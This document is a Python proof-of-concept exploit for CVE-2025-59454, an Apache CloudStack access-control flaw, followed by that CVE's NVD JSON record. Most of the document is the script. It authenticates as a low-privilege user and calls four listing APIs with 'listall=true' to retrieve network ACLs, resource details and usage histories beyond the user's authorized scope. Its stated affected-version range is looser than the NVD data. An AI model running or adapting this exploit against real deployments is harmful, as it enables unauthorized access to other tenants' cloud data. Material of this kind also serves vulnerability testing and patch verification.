CVE-2025-59454

# CVE-2025-59454 Apache CloudStack Access Control Bypass PoC # Requires authenticated session with valid user credentials import requests import json # Configuration TARGET_URL = "https://target-cloudstack-server.com" API_KEY = "your_api_key" SECRET_KEY = "your_secret_key" SESSION_USER = "[email protected]" SESSION_PASSWORD = "password123" def login(): """Authenticate to CloudStack and obtain session cookie""" login_url = f"{TARGET_URL}/api" login_data = { "command": "login", "username": SESSION_USER, "password": SESSION_PASSWORD, "domain": "/", "response": "json" } response = requests.post(login_url, data=login_data) return response.cookies def exploit_list_network_acls(cookies): """Exploit CVE-2025-59454: List Network ACLs beyond authorized scope""" api_url = f"{TARGET_URL}/api" payload = { "command": "listNetworkACLs", "listall": "true", # Key parameter for exploitation "response": "json" } response = requests.get(api_url, params=payload, cookies=cookies) return response.json() def exploit_list_resource_details(cookies): """Exploit CVE-2025-59454: List Resource Details beyond authorized scope""" api_url = f"{TARGET_URL}/api" payload = { "command": "listResourceDetails", "listall": "true", "resourcetype": "UserVm", "response": "json" } response = requests.get(api_url, params=payload, cookies=cookies) return response.json() def exploit_list_vm_usage_history(cookies): """Exploit CVE-2025-59454: List VM Usage History beyond authorized scope""" api_url = f"{TARGET_URL}/api" payload = { "command": "listVirtualMachinesUsageHistory", "listall": "true", "response": "json" } response = requests.get(api_url, params=payload, cookies=cookies) return response.json() def exploit_list_volume_usage_history(cookies): """Exploit CVE-2025-59454: List Volume Usage History beyond authorized scope""" api_url = f"{TARGET_URL}/api" payload = { "command": "listVolumesUsageHistory", "listall": "true", "response": "json" } response = requests.get(api_url, params=payload, cookies=cookies) return response.json() def main(): print("[*] CVE-2025-59454 Apache CloudStack Access Control Bypass") print("[*] Target: Apache CloudStack < 4.20.2.0 or < 4.22.0.0") # Step 1: Authenticate with low-privilege account print("\n[1] Authenticating with low-privilege user...") cookies = login() # Step 2: Exploit access control bypass print("[2] Exploiting access control bypass...") print("[*] Fetching Network ACLs (potentially unauthorized)...") network_acls = exploit_list_network_acls(cookies) print("[*] Fetching Resource Details (potentially unauthorized)...") resource_details = exploit_list_resource_details(cookies) print("[*] Fetching VM Usage History (potentially unauthorized)...") vm_usage = exploit_list_vm_usage_history(cookies) print("[*] Fetching Volume Usage History (potentially unauthorized)...") volume_usage = exploit_list_volume_usage_history(cookies) # Step 3: Analyze results print("\n[3] Analyzing collected data...") if network_acls.get('listnetworkaclresponse'): print(f"[!] Retrieved {len(network_acls['listnetworkaclresponse'])} Network ACLs") print("\n[*] Exploitation complete") return True if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-59454", "sourceIdentifier": "[email protected]", "published": "2025-11-27T12:15:47.550", "lastModified": "2025-12-02T14:38:07.577", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Apache CloudStack, a gap in access control checks affected the APIs - createNetworkACL\n- listNetworkACLs\n- listResourceDetails\n- listVirtualMachinesUsageHistory\n- listVolumesUsageHistory\n\nWhile these APIs were accessible only to authorized users, insufficient permission validation meant that users could occasionally access information beyond their intended scope.\n\n\n\n\nUsers are recommended to upgrade to Apache CloudStack 4.20.2.0 or 4.22.0.0, which fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:cloudstack:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.0", "versionEndExcluding": "4.20.2.0", "matchCriteriaId": "740D231F-5A6F-44FD-9CC8-246BF3BDA73F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:apache:cloudstack:4.21.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "8D19C2F1-2730-4EAE-A7CF-950F185B76FC"}]}]}], "references": [{"url": "https://lists.apache.org/thread/0hlklvlwhzsfw39nocmyxb6svjbs9xbc", "source": "[email protected]", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/11/27/3", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}